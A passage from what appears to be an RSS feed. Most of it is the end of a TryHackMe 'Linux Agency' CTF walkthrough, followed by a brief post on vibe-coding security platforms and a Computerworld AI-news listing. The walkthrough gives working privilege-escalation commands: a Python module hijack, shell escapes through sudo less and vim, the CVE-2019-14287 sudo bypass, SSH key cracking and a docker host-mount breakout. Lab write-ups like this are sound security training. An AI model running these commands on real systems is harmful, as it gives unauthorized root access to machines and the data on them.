NOPASSWD: /opt/scripts/Gun-Shop.py as jordan</pre><p>Run the script:</p><pre>sudo -u jordan /opt/scripts/Gun-Shop.py<br># Error: No module named 'shop'</pre><p>The script imports a module called shop which doesn't exist. We can create it in a directory we control:</p><p><strong>Step 1:</strong> Create a malicious shop module:</p><pre>mkdir -p /tmp/shop<br>echo 'import os; os.system("/bin/bash")' &gt; /tmp/shop/shop.py</pre><p><strong>Step 2:</strong> Override PYTHONPATH so Python finds our module first:</p><pre>sudo -u jordan PYTHONPATH=/tmp/shop/ /opt/scripts/Gun-Shop.py</pre><pre>id<br># uid=... (jordan)<br>cat /home/jordan/flag.txt</pre><p>Flag: jordan{fcbc4b3c31c9b58289b3946978f9e3c3}</p><blockquote><strong>💡 What we learned:</strong><em> Python module hijacking — a real-world PrivEsc technique. </em><em>PYTHONPATH tells Python where to search for modules before the standard library paths. If an attacker controls a directory early in that path, they can substitute any module with malicious code.</em></blockquote><h3>🎯 Ken — sudo + less (GTFOBins)</h3><pre># As jordan:<br>sudo -l<br># (jordan) NOPASSWD: /usr/bin/less as ken</pre><pre>sudo -u ken /usr/bin/less /etc/profile</pre><p>Once less opens, type ! followed by:</p><pre>!/bin/sh</pre><p>Press Enter — you drop into a shell as <strong>ken</strong>.</p><pre>id<br>cat /home/ken/flag.txt</pre><p>Flag: ken{4115bf456d1aaf012ed4550c418ba99f}</p><h3>🎯 Sean — sudo + vim (GTFOBins)</h3><pre># As ken:<br>sudo -l<br># (ken) NOPASSWD: /usr/bin/vim as sean</pre><pre>sudo -u sean vim -c ':!/bin/sh'</pre><p>The -c flag runs a Vim command on startup. :!/bin/sh executes a shell command from within Vim.</p><pre>id<br>cat /home/sean/flag.txt</pre><p>Flag: sean{4c5685f4db7966a43cf8e95859801281}</p><blockquote><strong>💡 What we learned:</strong><em> Vim is far more than a text editor — it can execute shell commands, run scripts, and spawn processes. Granting </em><em>sudo vim to any user is effectively granting root.</em></blockquote><h3>🎯 Penelope — Password Hidden in Base64</h3><pre># As sean:<br>printf %s 'VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==' | base64 -d<br># Output: "The password of penelope is p3nelope"</pre><pre>su penelope<br># Password: p3nelope<br>cat /home/penelope/flag.txt</pre><p>Flag: penelope{2da1c2e9d2bd0004556ae9e107c1d222}</p><h3>🎯 Maya — SUID base64 (GTFOBins)</h3><pre># As penelope:<br>ls -lhA /home/penelope/<br># A 'base64' binary with the SUID bit set!</pre><p>GTFOBins SUID base64 exploit — read files as the binary’s owner:</p><pre>LFILE=/home/maya/flag.txt<br>./base64 "$LFILE" | base64 -d</pre><p>Flag: maya{a66e159374b98f64f89f7c8d458ebb2b}</p><blockquote><strong>💡 What we learned:</strong><em> SUID (Set User ID) — when set on a binary, it executes with the file owner’s privileges rather than the caller’s. Find SUID binaries with: </em><em>find / -perm -4000 2&gt;/dev/null. Cross-reference every result with GTFOBins.</em></blockquote><h3>🎯 Robert — SSH Private Key Cracking</h3><pre># As maya:<br>ls -lhA /home/maya/<br>ls -lhA /home/maya/old_robert_ssh/<br># id_rsa and id_rsa.pub found</pre><p><strong>Step 1:</strong> Copy the private key to your local machine (new terminal tab):</p><pre>scp maya@&lt;IP&gt;:/home/maya/old_robert_ssh/id_rsa ./id_rsa_robert<br>chmod 600 id_rsa_robert</pre><p><strong>Step 2:</strong> Convert the key to a crackable hash:</p><pre>ssh2john id_rsa_robert &gt; robert_ssh_hash.txt</pre><p><strong>Step 3:</strong> Crack it with John the Ripper:</p><pre>john robert_ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> industryweapon</p><p><strong>Step 4:</strong> Find Robert’s SSH port on the target:</p><pre># On the target machine:<br>ss -nlpt | grep 22<br># Port 2222 is listening</pre><p><strong>Step 5:</strong> Connect:</p><pre>ssh robert@127.0.0.1 -p 2222 -i id_rsa_robert<br># Passphrase: industryweapon<br>cat /home/robert/user.txt</pre><p>Flag (user.txt): user{620fb94d32470e1e9dcf8926481efc96}</p><blockquote><strong>💡 What we learned:</strong><em> SSH private key cracking — </em><em>ssh2john extracts the hash, </em><em>john cracks it. In real engagements, always look for </em><em>id_rsa files in home directories, backup folders, and </em><em>.ssh/ directories. Encrypted keys with weak passphrases are a common finding.</em></blockquote><h3>👑 Root — Two-Stage Escalation</h3><h3>Stage 1: CVE-2019–14287 (Sudo User ID Bypass)</h3><pre># As robert:<br>sudo --version<br># Reveals a vulnerable version (&lt; 1.8.28)<br>sudo -u#-1 /bin/bash<br>whoami<br># root!</pre><p><strong>How it works:</strong> This is <strong>CVE-2019–14287</strong>. When a sudoers rule allows a user to run commands as any user, passing -u#-1 causes sudo to interpret the user ID as 0 (root) due to an integer overflow in how sudo handles negative UIDs. Patched in sudo 1.8.28.</p><pre>cd /root<br>ls</pre><h3>Stage 2: Docker Group → Root (root.txt)</h3><pre># As root (inside the container/restricted environment):<br>id<br># You're in the docker group<br>find / -name docker 2&gt;/dev/null<br># Found at /tmp/docker or similar<br>./docker ps -a<br>./docker image ls<br># "mangoman" image exists</pre><p>Mount the host filesystem into a container and chroot into it:</p><pre>./docker run -v /:/mnt --rm -it mangoman chroot /mnt sh</pre><pre>id<br># uid=0(root) gid=0(root) — TRUE host root<br>cat /root/root.txt</pre><p>Flag (root.txt): root{62ca2110ce7df377872dd9f0797f8476}</p><blockquote><strong>💡 What we learned:</strong><em> Docker group membership is equivalent to root access. </em><em>-v /:/mnt mounts the entire host filesystem into the container, and </em><em>chroot /mnt makes the container treat the host filesystem as its root. This is a well-documented container escape — never add untrusted users to the </em><em>docker group.</em></blockquote><h3>🏆 Flags Summary</h3><p>User Technique Category mission1–11 find / grep / cat Basic enumeration mission12 env Environment variables mission13 chmod File permissions mission14 base64 -d Encoding mission15 Binary → ASCII Encoding mission16 xxd -r -p (Hex) Encoding mission17 chmod u+x Execute permissions mission18 javac + java Java compilation mission19 ruby Scripting mission20 gcc C compilation mission21 python3 Scripting mission22 script -qc Restricted shell escape mission23 pty.spawn() Python interpreter escape mission24 curl + /etc/hosts Virtual hosting mission25 strings + .viminfo Binary analysis mission26 export PATH PATH manipulation mission27 strings on image Steganography mission28 less Long filename edge case mission29 exec in Ruby + .reverse Ruby escape + obfuscation mission30 grep -r in CMS File enumeration viktor git log Git history dalia Writable cron script Cron job exploitation silvio sudo zip GTFOBins reza sudo git + PAGER GTFOBins jordan PYTHONPATH hijack Module hijacking ken sudo less + ! GTFOBins sean sudo vim -c GTFOBins penelope Base64 password Encoded credentials maya SUID base64 SUID exploitation robert ssh2john + john SSH key cracking root (user.txt) sudo -u#-1 CVE-2019-14287 root (root.txt) docker run -v /:/mnt Docker breakout</p><h3>🧠 Key Takeaways</h3><p><strong>Linux Fundamentals:</strong></p><ul><li>ls -la always — hidden files, permissions at a glance</li><li>find and grep -r for wide enumeration</li><li>env for environment variable inspection</li><li>file to identify file types regardless of extension</li><li>strings to extract readable data from binaries</li></ul><p><strong>Encoding &amp; Decoding:</strong></p><ul><li>Base64 (base64 -d), Hex (xxd -r -p), Binary (Python one-liner)</li><li>Reversed strings — check file content and filenames alike</li></ul><p><strong>Scripting Languages:</strong></p><ul><li>Python: pty.spawn("/bin/bash") for shell upgrade</li><li>Ruby: exec "/bin/bash" or Dir/File for file ops</li><li>Java: javac → java, C: gcc → ./binary</li></ul><p><strong>Privilege Escalation Checklist:</strong></p><ol><li>sudo -l → GTFOBins</li><li>find / -perm -4000 2&gt;/dev/null → SUID binaries → GTFOBins</li><li>cat /etc/crontab + ls /etc/cron.d/ → writable scripts run by root</li><li>id → check group memberships (docker!)</li><li>Check $PATH, env variables, writable directories in PATH</li></ol><h3>📚 Resources</h3><ul><li>🔗 <a href="https://gtfobins.github.io/">GTFOBins</a> — sudo/SUID binary exploitation reference</li><li>🔗 <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md">PayloadsAllTheThings — Reverse Shell Cheatsheet</a></li><li>🔗 <a href="https://www.exploit-db.com/exploits/47502">Exploit-DB: CVE-2019–14287</a></li><li>🔗 <a href="https://tryhackme.com/room/sudovulnsbypass">TryHackMe: Sudo Security Bypass</a></li><li>🔗 <a href="https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation">HackTricks: Docker Breakout</a></li><li>🔗 <a href="https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html">RapidTables Converter</a></li></ul><h3>💬 Final Thoughts</h3><p><strong>Linux Agency</strong> is not just a CTF room — it’s a condensed simulation of a real lateral movement and privilege escalation engagement. The 30-user chain forces you to internalize Linux enumeration as a reflex, not a checklist. The privilege escalation phase covers more ground than most dedicated PrivEsc rooms.</p><p>If you’re preparing for <strong>OSCP</strong>, <strong>CPTS</strong> or any practical security certification, this room belongs in your training regimen. Do it without hints first, refer to this write-up only when truly stuck — the struggle is where the learning happens.</p><p><em>Happy Hacking! 🐧</em></p><p><em>Tags: #TryHackMe #CTF #LinuxAgency #PrivilegeEscalation #Linux #Pentesting #CyberSecurity #OSCP #GTFOBins #WriteUp</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=82a20bd23d67" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-linux-agency-complete-write-up-walkthrough-82a20bd23d67">TryHackMe — Linux Agency | Complete Write-Up &amp; Walkthrough</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[6 Best Vibe Coding Security Platforms of 2026]]></title>
<description><![CDATA[In this post, I will show you the 6 best Vibe Coding security platforms of 2026. Key Takeaways Vibe coding security has two layers: governing the AI building activity and securing the AI-generated code. A complete program needs both. Pluto Security leads the list as the platform that secures vibe...]]></description>
<link>https://tsecurity.de/de/3672760/it-security-nachrichten/6-best-vibe-coding-security-platforms-of-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672760/it-security-nachrichten/6-best-vibe-coding-security-platforms-of-2026/</guid>
<pubDate>Thu, 16 Jul 2026 10:08:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In this post, I will show you the 6 best Vibe Coding security platforms of 2026. Key Takeaways Vibe coding security has two layers: governing the AI building activity and securing the AI-generated code. A complete program needs both. Pluto Security leads the list as the platform that secures vibe coding at the governance layer, […]</p>
<p>The post <a href="https://secureblitz.com/best-vibe-coding-security-platforms/">6 Best Vibe Coding Security Platforms of 2026</a> appeared first on <a href="https://secureblitz.com/">SecureBlitz Cybersecurity</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Artificial Intelligence]]></title>
<description><![CDATA[Latest from todaynewsDeepMind CEO again pushes for a frontier AI standards bodyDemis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.By Evan SchumanJul 15, 20268 minsArtificial IntelligenceGovernmentLaws and Regulation...]]></description>
<link>https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</guid>
<pubDate>Wed, 15 Jul 2026 23:02:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><section class="latest-content"><div class="container"><header class="latest-content__header"><h2 class="latest-content__title sr-only"><span>Latest from today</span></h2></header><div class="grid latest-content__content"><div class="col-12 col-7@md col-8@lg"><div class="latest-content__content-featured"><a class="card card--xxl " href="https://www.computerworld.com/article/4197511/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body-2.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">news</span></div><div class="card__image"><div class="insider-image"><div class="image"><img width="400px" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197511-0-18848000-1784149211-shutterstock_2540223947.jpg?quality=50&amp;strip=all&amp;w=1046" data-id="idg_render_hero_index_one_card_image" sizes="
            (min-resolution: 3dppx) and (max-width: 600px) 900px,
            (min-resolution: 3dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 2dppx) and (max-width: 600px) 900px,
            (min-resolution: 2dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 1dppx) and (max-width: 600px) 900px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1300px" alt="Image" loading="eager"></div></div></div><h3 class="card__title">DeepMind CEO again pushes for a frontier AI standards body</h3><p class="card__description">Demis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.</p><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T20:59:29+00:00">Jul 15, 2026</span></span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a>
		</div><div class="grid grid--cols-7@md grid--cols-8@lg latest-content__content-main"><div class="col-12 col-7@md col-4@lg latest-content__card-main"><a class="card " href="https://www.computerworld.com/article/4197437/apples-openai-lawsuit-the-lunacy-of-trying-to-limit-what-ex-employees-can-tell-future-employers.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197437-0-98299000-1784131210-thinkstockphotos-493608259-100632547-orig.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">Apple’s OpenAI lawsuit: The lunacy of trying to limit what ex-employees can tell future employers</h3><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:59:35+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a></div><div class="col-12 col-7@md col-4@lg latest-content__card-main"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/4197338/what-problems-would-an-ai-speaker-from-openai-actually-solve.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197338-0-98391100-1784130807-Apple-HomePod-mini-color-lineup.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">What problems would an AI speaker from OpenAI actually solve?</h3><div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:52:45+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Vendors and Providers</span></span></div></a></div></div></div><div class="col-12 col-5@md col-4@lg latest-content__content-secondary"><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4192438/how-to-unionize-your-tech-workplace.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">feature</span></div><h3 class="card__title">How to unionize your tech workplace</h3><div class="card__info"><span>By Robert Mitchell</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T11:00:00+00:00">Jul 15, 2026</span></span><span>18 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Careers</span></span><span class="card__tag"><span class="tag">IT Jobs</span></span><span class="card__tag"><span class="tag">Technology Industry</span></span></div></a>
		</div><div class="latest-content__card-secondary"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/1613762/android-widgets.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">tip</span></div><h3 class="card__title">5 wild ways to make Android widgets more useful</h3><div class="card__info"><span>By JR Raphael</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T09:45:00+00:00">Jul 15, 2026</span></span><span>12 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Mobile Apps</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4197029/microsoft-is-forcing-an-enterprise-transition-to-passkeys.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Microsoft is forcing an enterprise transition to passkeys</h3><div class="card__info"><span>By Taryn Plumb</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T02:04:06+00:00">Jul 14, 2026</span></span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Access Control</span></span><span class="card__tag"><span class="tag">Authentication</span></span><span class="card__tag"><span class="tag">Identity and Access Management</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196704/siri-ai-steals-the-show-as-the-ios-27-public-beta-lands.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Siri AI steals the show as the iOS 27 public beta lands</h3><div class="card__info"><span>By Jonny Evans</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T15:47:35+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Operating Systems</span></span><span class="card__tag"><span class="tag">iOS</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196309/with-its-latest-layoffs-microsoft-goes-all-in-on-ai.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">opinion</span></div><h3 class="card__title">With its latest layoffs, Microsoft goes all in on AI</h3><div class="card__info"><span>By Preston Gralla</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T11:00:00+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">IT Strategy</span></span><span class="card__tag"><span class="tag">Microsoft</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196652/forg365-industrializes-microsoft-365-phishing-with-ai-generated-lures.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Forg365 industrializes Microsoft 365 phishing with AI-generated lures</h3><div class="card__info"><span>By Prasanth Aby Thomas</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T09:51:16+00:00">Jul 14, 2026</span></span><span>4 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span><span class="card__tag"><span class="tag">Office Suites</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></a>
		</div></div></div></div></section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><div class="content-listing-articles"><div class="container"><h2 class="content-listing-articles__title">Articles</h2><div class="content-listing-articles__container content-listing-articles__container--collapsed" data-collapse-articles="6" data-content-listing-articles><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’</h3><p class="card__description">Analysts and consultants applaud the move as potentially delivering the development consistency that the current offerings lack, but some worry that treating the company as neutral is a mistake.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Evan Schuman</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Nonprofits</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196262/ai-is-killing-low-cost-smartphones.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">AI is killing low cost smartphones</h3><p class="card__description">Data from Omdia and Counterpoint shows that while Apple and Samsung thrive, the rest of the industry takes a dive</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Mobile Phones</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196220/meta-pulls-instagram-ai-feature-amid-privacy-concerns.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta pulls Instagram AI feature amid privacy concerns</h3><p class="card__description">By specifying a public account, users could allow the AI ​​model to use the person’s images as a reference without the account holder being notified.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Viktor Eriksson</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>1 min</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Instagram</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195176/qa-how-google-plans-to-reinvent-the-spreadsheet-with-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">feature</span></div><h3 class="card__title">Q&amp;A: How Google plans to reinvent the spreadsheet with AI</h3><p class="card__description">Soon, Google wants to see AI doing the spreadsheet busywork, says Eric Birnbaum, director of product management for Google Sheets.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Matthew Finnegan</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>10 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Google Sheets</span></span><span class="card__tag"><span class="tag">Google Workspace</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">brandpost</span><span class="card__sponsor-text">Sponsored by Tether</span></div><h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3><p class="card__description"></p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By tether</span></div> <div class="card__info card__info--light"><span>Jul 9, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">‘Rotten to its core’ — Apple files an explosive lawsuit against OpenAI</h3><p class="card__description">Apple accuses OpenAI and former Apple Vice President Tang Tan of extensive coordinated data theft and asks whether OpenAI’s hardware plans are based around exfiltrated Apple info.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">opinion</span></div><h3 class="card__title">Apple is prepping for life after the AI gold rush</h3><p class="card__description">The company's interest in compression of AI models is the right approach.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195678/microsoft-exchange-server-on-prem-gets-a-little-harder-to-use.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Microsoft Exchange Server on prem gets a little harder to use</h3><p class="card__description">The lightweight web client is going away, placing more demands on systems still clinging to Microsoft’s on-prem email system.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Email Clients</span></span><span class="card__tag"><span class="tag">Microsoft Exchange</span></span><span class="card__tag"><span class="tag">Microsoft Outlook</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195636/mistral-joins-rush-to-build-physical-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Mistral joins rush to build physical AI</h3><p class="card__description">Its Robostral Navigate AI model needs input from just one color camera, doing without Lidar, depth sensors, or multiple viewpoints.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Robotics</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195628/apple-will-buy-more-us-made-components-from-broadcom.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Apple will buy more US-made components from Broadcom</h3><p class="card__description">Chips and thin-film bulk acoustic resonator (FBAR) filters are on the menu.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Networking</span></span><span class="card__tag"><span class="tag">Wi-Fi</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195528/meta-launches-low-cost-muse-spark-1-1-as-enterprise-ai-spending-comes-under-scrutiny-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta launches low-cost Muse Spark 1.1 as enterprise AI spending comes under scrutiny</h3><p class="card__description">Meta says the model delivers competitive performance against OpenAI, Anthropic, and Google offerings while costing a fraction as much to run.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Anirban Ghoshal</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div 